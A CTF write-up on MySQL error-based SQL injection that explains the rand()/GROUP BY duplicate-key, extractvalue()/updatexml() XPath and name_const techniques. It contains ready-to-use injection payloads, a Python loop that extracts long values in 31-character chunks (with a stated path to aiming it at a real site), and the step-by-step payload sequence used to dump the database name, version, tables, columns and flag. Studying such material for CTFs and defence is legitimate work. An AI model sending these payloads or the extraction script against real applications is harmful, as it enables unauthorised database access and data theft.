Because of exam revision I stopped for several days; today, for a change of pace, I did a CTF challenge about error-based injection. The challenge link first: here
I also collected some of the material available online about error-based methods; I'm not including the source links here, please forgive me, experts :P
0x00 About error-based injection
In my own words, error-based SQL injection means deliberately making the SQL statement fail in a way that puts the data we want into the error message, which the page then echoes back to us (of course this only works if the application displays database errors; real sites generally avoid that, so if you run into one, count yourself lucky).
0x01 SQL constructs that produce error-based echo (the functions below only work on MySQL; other databases still need to be verified and will be added when I have working examples)
First: errors from rand() and GROUP BY
Start with what the MySQL manual says about rand() and GROUP BY; we are going to exploit the "duplicate key" error that GROUP BY raises when its key is built from rand():
RAND() in a WHERE clause is re-evaluated every time the WHERE is executed.
You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times.
That re-evaluation is exactly the bug we rely on. rand(0) is a seeded generator, so floor(rand(0)*2) always yields the fixed sequence 0,1,1,0,1,1,... GROUP BY evaluates the key once to look the group up in its temporary table and again when it inserts a new group, so with at least three source rows it ends up inserting a key that already exists and fails with "Duplicate entry '1#...' for key 'group_key'". Whatever we concat() into the key after the 0x23 ('#') separator is printed inside that message. information_schema.tables is used as the source table because it always has enough rows.
Formula: username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2), 0x23, (SQL statement of the data you want)) x from information_schema.tables group by x) a) and '1'='1
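To see why the formula needs at least three rows and why the duplicated key always carries the "1#" prefix, here is an added Python model. It is not code from the original post and not MySQL's source: it reimplements MySQL's rand() generator (the seed1/seed2 recurrence and constants are reproduced from memory of sql/item_func.cc and mysys/my_rnd.c, so treat them as an assumption) plus a simplified model of how GROUP BY fills its temporary table (look the key up, and re-evaluate it on insert). The index name group_key and the login form's username parameter are also assumptions.

```python
# Added example: model of the floor(rand(0)*2) + GROUP BY duplicate-key error.
# Not MySQL source and not code from the original writeup.

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's rand() (assumed, from memory)


class MySQLRand:
    """MySQL's seeded rand(N): a two-state linear congruential generator.
    Initialisation and recurrence are reproduced from memory of
    sql/item_func.cc and mysys/my_rnd.c; treat them as an assumption."""

    def __init__(self, seed):
        self.seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
        self.seed2 = (seed * 0x10000001) % MAX_VALUE

    def rand(self):
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


def floor_rand_seq(seed, n):
    """First n values of floor(rand(seed)*2); for seed 0 this is 0,1,1,0,1,1,..."""
    r = MySQLRand(seed)
    return [int(r.rand() * 2) for _ in range(n)]


def group_by_rand(rows, seed, secret):
    """Simplified model of
        SELECT count(*), concat(floor(rand(seed)*2), 0x23, secret) x
        FROM <a table with `rows` rows> GROUP BY x
    GROUP BY is modelled as: evaluate the key to look the group up in the
    temporary table; if the group is new, evaluate the key again to insert it.
    Returns (error_or_None, groups). 'group_key' is the index name MySQL
    reports for the GROUP BY temporary table (assumed)."""
    r = MySQLRand(seed)
    groups = {}
    for _ in range(rows):
        key = f"{int(r.rand() * 2)}#{secret}"  # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = f"{int(r.rand() * 2)}#{secret}"  # re-evaluated for the insert
        if key in groups:
            return f"Duplicate entry '{key}' for key 'group_key'", groups
        groups[key] = 1
    return None, groups


def build_payload(subquery):
    """The writeup's formula with the data subquery filled in (assumed: the
    injection point is the username parameter of a login form)."""
    return ("admin' and (select 1 from (select count(*), concat(floor(rand(0)*2), 0x23, ("
            + subquery + ")) x from information_schema.tables group by x) a) and '1'='1")


if __name__ == "__main__":
    print(floor_rand_seq(0, 8))
    print(group_by_rand(2, 0, "secret")[0])  # None: two source rows are not enough
    print(group_by_rand(3, 0, "secret")[0])  # duplicate-key error carrying the secret
    print(build_payload("select database()"))
```

Run it and the three-row case prints the Duplicate entry message with the concatenated value after "1#", while the two-row case returns no error; that is why a table with only one or two rows will not work as the source of the GROUP BY.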
Second: leaking information through XPath errors
This mainly uses the two functions extractvalue() and updatexml(). MySQL has shipped built-in XML parsing functions since 5.1, so this injection only works on 5.1 and later.
From the SQL manual:
Syntax: extractvalue(xml_document, xpath_string)
First argument: xml_document, a string holding the XML document. Second argument: xpath_string, a string in XPath syntax (look up an XPath tutorial online if you don't know it). Function: returns the string matched by the XPath query in the target XML.
Syntax: updatexml(xml_document, xpath_string, new_value)
The first two arguments are the same as for extractvalue(). Third argument: new_value, a string that replaces the matched data. Function: changes the value of the node in the document that matches the XPath expression.
So all we need is an xpath_string that is not valid XPath: MySQL then raises "XPATH syntax error: '...'" and prints the offending expression back. The 0x7e ('~') prefix guarantees the string is invalid XPath and marks where our data starts. The caveat is that the error message shows at most 32 characters, so longer values have to be read in pieces with mid() or substr().
Formula 1: username=admin' and (extractvalue(1, concat(0x7e, (SQL statement of the data you want)))) and '1'='1
Formula 2: username=admin' and (updatexml(1, concat(0x7e, (SQL statement of the data you want)), 1)) and '1'='1
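The 32-character limit is the practical obstacle with this method, so here is an added Python example (not code from the original post) that reads a longer value in 31-character windows with mid() and reassembles it; updatexml() works the same way. fake_db is a constructed stand-in for the vulnerable application that mimics MySQL's truncated XPATH error message, and the subquery strings and secret values in it are constructed test data; the username parameter of a login form is assumed as the injection point. To use it against a real target, replace the query callable with an HTTP request that returns the page body.

```python
# Added example: reassembling a value longer than the 32-character window
# leaked by extractvalue()/updatexml(). Not code from the original writeup.
import re

WINDOW = 32          # characters MySQL shows in "XPATH syntax error: '...'"
CHUNK = WINDOW - 1   # minus the leading '~' marker

ERR_RE = re.compile(r"XPATH syntax error: '~(.*)'")
MID_RE = re.compile(r"mid\(\((.*)\),(\d+),(\d+)\)")


def build_payload(subquery, offset):
    """admin' and extractvalue(1, concat(0x7e, mid((subquery),offset,31))) and '1'='1
    The injection point (a login form's username parameter) is assumed."""
    return (f"admin' and (extractvalue(1, concat(0x7e, mid(({subquery}),{offset},{CHUNK}))))"
            f" and '1'='1")


def fake_db(secrets, payload):
    """Constructed oracle standing in for the vulnerable application: evaluates
    the mid(...) this script sends against a dict of subquery -> result and
    returns MySQL's error message truncated to 32 characters."""
    m = MID_RE.search(payload)
    if not m:
        return "login failed"          # no syntax error -> nothing leaked
    sub, off, ln = m.group(1), int(m.group(2)), int(m.group(3))
    value = secrets[sub]
    piece = value[off - 1: off - 1 + ln]   # mid() offsets are 1-based
    return f"XPATH syntax error: '{('~' + piece)[:WINDOW]}'"


def extract(query, subquery):
    """Pull the full result of `subquery` through repeated error-based reads.
    `query(payload)` must return the page body for one injected request."""
    out = []
    offset = 1
    while True:
        m = ERR_RE.search(query(build_payload(subquery, offset)))
        if not m:
            raise RuntimeError("no error echo in response")
        piece = m.group(1)
        out.append(piece)
        if len(piece) < CHUNK:         # short (or empty) window: end of value
            break
        offset += CHUNK
    return "".join(out)


if __name__ == "__main__":
    # Constructed sample data: one short value and one that needs three reads.
    secrets = {
        "select version()": "5.1.61-alibaba-rds-201404-log",
        "select group_concat(table_name) from information_schema.tables "
        "where table_schema=database()": "a" * 40 + "b" * 30,
    }
    query = lambda p: fake_db(secrets, p)
    for sub in secrets:
        print(sub, "->", extract(query, sub))
```

Each request leaks one window; the loop stops as soon as a window comes back shorter than 31 characters, which also covers values whose length is an exact multiple of 31 (the last read returns an empty window).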
Third: duplicate column name errors (I tested this method successfully on my local database, but it had no effect on the challenge below, so I won't explain it in detail)
Payload (URL-decoded): id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
0x02 Application
Enough theory, let's apply it. On this challenge, first we leak the database name. Result: R0866cplushua
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2), 0x23, (select database())) x from information_schema.tables group by x) a) and '1'='1
Then leak the database version. Result: 5.1.61-alibaba-rds-201404-log
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2), 0x23, (select version())) x from information_schema.tables group by x) a) and '1'='1
Then leak the table names. Result: log, motto, user (these have to be leaked one at a time, by stepping the limit offset)
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2), 0x23, (select table_name from information_schema.tables where table_schema='R0866cplushua' limit 0,1)) x from information_schema.tables group by x) a) and '1'='1
Then leak the column names. Result: id, username, motto (I started with the user table, but its data wasn't what we wanted, so I switched to the motto table; again one column at a time)
username=admin' and (select 5468 from (select count(*), concat(floor(rand(0)*2), 0x23, (select column_name from information_schema.columns where table_name='motto' and table_schema='R0866cplushua' limit 0,1)) x from information_schema.tables group by x) a) and '1'='1
Finally, the data. Result: key#notfound!# (I used the XPath method here because I didn't know why the first method wouldn't get it out)
username=admin' and (extractvalue(1, concat(0x7e, (select concat(username,0x3a,motto) from motto limit 3,1)))) and '1'='1 (sent URL-encoded)
And with that the challenge is solved. I've only just learned all of the above, so if anything is wrong, please correct me, experts; I'd also love to see you share other error-based injection methods.
Notes on error-based SQL injection